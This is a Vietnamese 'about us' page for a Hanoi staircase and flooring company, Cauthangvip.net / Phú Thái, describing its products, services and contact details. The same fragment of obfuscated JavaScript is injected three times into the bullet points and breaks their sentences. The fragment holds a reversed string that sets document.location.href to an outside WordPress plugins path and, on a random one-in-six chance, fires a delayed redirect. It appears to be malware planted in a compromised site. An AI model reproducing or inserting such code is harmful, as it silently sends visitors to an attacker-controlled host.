Giới thiệu về Cauthangvip.net

Công ty TNHH Thương mại và Xây dựng Phú Thái chuyên sản xuất, tư vấn và lắp đặt các loại cầu thang bộ:  cầu thang kính cường lực, cầu thang inox nhập khẩu, cầu thang sắt hộp, cầu thang sắt nghệ thuậtcầu thang sắt xương cá gỗ, cầu thang xoáy,  cầu thang dây cáp, cửa hoa, cửa sắt, PVC, sàn gỗ công nghiệp, sàn gỗ tự nhiên, mặt bậc cầu thang

  • Dịch vụ hoàn hảo: Chúng tôi khảo sát, thiết kế, tư vấn và thiết kế miễn phí cùng khách hàng, dịch vụ bảo hành sản phẩm dài hạn.
  • Chất lượng tốt nhất: Sản phẩm toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do chúng tôi cung cấp đều có nguồn gốc xuất sứ rõ ràng, tiêu chuẩn linh kiện, phụ kiện phù hợp với điều kiện môi trường Việt Nam toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do đó sản phẩm có độ bền cao, tiết kiệm chi phí, đảm bảo thẩm mỹ trong quá trình sử dụng.
  • Giá cả hợp lý: Đội ngũ thiết kế chuyên nghiệp giàu sức sáng tạo, đội ngũ nhân viên kinh toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doanh trẻ, nhiệt huyết, đội ngũ kỹ thuật có tay nghề cao, thi công hiệu quả – giảm chi phí rủi ro trong quá trình thi công, sản xuất và bán hàng trực tiếp. Tất cả các yếu tố trên đem đến cho chúng tôi 1 giá thành hợp lý và Công ty TNHH thương mại và xây dựng Phú Thái chia sẻ  điều này với khách hàng bằng mức giá cạnh tranh.

Với những tiêu chí trên Công ty TNHH Thương mại và Xây dựng Phú Thái nỗ lực đáp ứng đảm bảo đem đến sự hài lòng cho Quý khách. Bởi chúng tôi hiểu rằng khi quý vị hài lòng với sản phẩm của chúng tôi thì chính Quý vị là “Đại sứ” tốt nhất giới thiệu sản phẩm của chúng tôi đến bạn bè và người thân của quý vị. Đó là tiêu chí phát triển cao nhất của Công ty TNHH Thương mại và Xây dựng Phú Thái.

         Trân trọng!

Showroom: Số 19 Phố Cự Lộc – P. Thượng Đình – Q. Thanh Xuân – TP.Hà Nội
Xưởng sản xuất:  Khu công nghiệp Thanh Oai – Thanh Oai – Hà Nội
 ĐT: 0466. 863.519  –   Hotline: 0983.312.416.
Email: cauthangvipnethanoi@gmail.com